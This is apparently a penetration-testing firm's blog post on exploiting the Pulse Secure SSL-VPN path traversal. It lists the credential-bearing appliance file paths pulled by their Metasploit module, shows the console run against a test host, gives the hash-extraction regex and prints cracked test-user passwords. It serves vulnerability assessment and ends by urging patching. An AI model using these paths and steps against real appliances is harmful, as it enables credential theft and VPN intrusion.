We exploit Pulse Secure Connect SSL VPN

There has recently been a number of security vulnerabilities in the Pulse Secure Connect SSL-VPN appliance published. The vulnerability was initial disclosed by Orange Tsai and Meg Chang. A bit shout out to the pair is well deserved, they spent a lot of time researching this vulnerability.

Recently we were asked to look at how viable the attack is for one of our clients. So, we did.

According to the vulnerability disclosures, the HTML5 module on the appliance has a path traversal vulnerability which will allow us to arbitrarily access all files on the appliance. However, there are no published tools to perform this attack in any way. We changed this my creating a Metasploit Framework module that would perform the initial stages of the attack.

We started by creating a standalone exploit in python and then developed this over the weekend prior to the attack into a Metasploit Framework module for ease. The module would download the following files from any Pulse Secure Connect server:

/data/runtime/mtmp/system
/data/runtime/mtmp/lmdb/dataa/data.mdb
/data/runtime/mtmp/lmdb/dataa/lock.mdb
/data/runtime/mtmp/lmdb/randomVal/data.mdb
/data/runtime/mtmp/lmdb/randomVal/lock.mdb

We would then extract from the data.mdb file any clear text passwords along with the usernames. We would also look through the system file and extract any password hashes for usernames that we did not find a clear text password for.

   =[ metasploit v5.0.38-dev      ] + -- --=[ 1912 exploits - 1073 auxiliary - 329 post   ] + -- --=[ 545 payloads - 45 encoders - 10 nops    ] + -- --=[ 3 evasion           ]
msf5 > use exploit/http/pulse-secure
msf5 exploit(exploit/http/pulse-secure) > set RHOSTS test.hedgehogsecurity.gi
msf5 exploit(exploit/http/pulse-secure) > set RPORT 443
msf5 exploit(exploit/http/pulse-secure) > exploit
[*] Extracting files from test.hedgehogsecurity.gi
[+] mtmp/system – Success
[+] mtmp/lmdb/dataa/data.mdb – Success
[+] mtmp/lmdb/dataa/lock.mdb – Success
[+] mtmp/lmdb/randomVal/data.mdb – Success
[+] mtmp/lmdb/randomVal/lock.mdb – Success [*] Extracting cleartext passwords
[!] FAIL! – No cleartext passwords found [*] Extracting password hashes 
[*] Using regex (\$1\$danastre\$)(.).*([a-zA-Z]+\\[a-z]+) [+] 62 hashes extracted – passing to hashcat server
[+] passwords cracked, check loot. [*] Exploit completed.

Checking the loot file, we find a number of MD5 password hashes along with the usernames and the clear text passwords:

$1$danastre$2Zrp.jJlSARuQ5zbrhpMh/:Password1:testuser1
$1$danastre$ky/o1xdYxCo9Qm9/RRSQN/:Password2:testuser2

These are exactly the passwords we used for the test users and logging into the VPN was then very simple.

References

Affected Demographic

This issue will affect all users  any users on the any of the SSL-VPN solution.

Recommendation

Apply the patches released for the platform.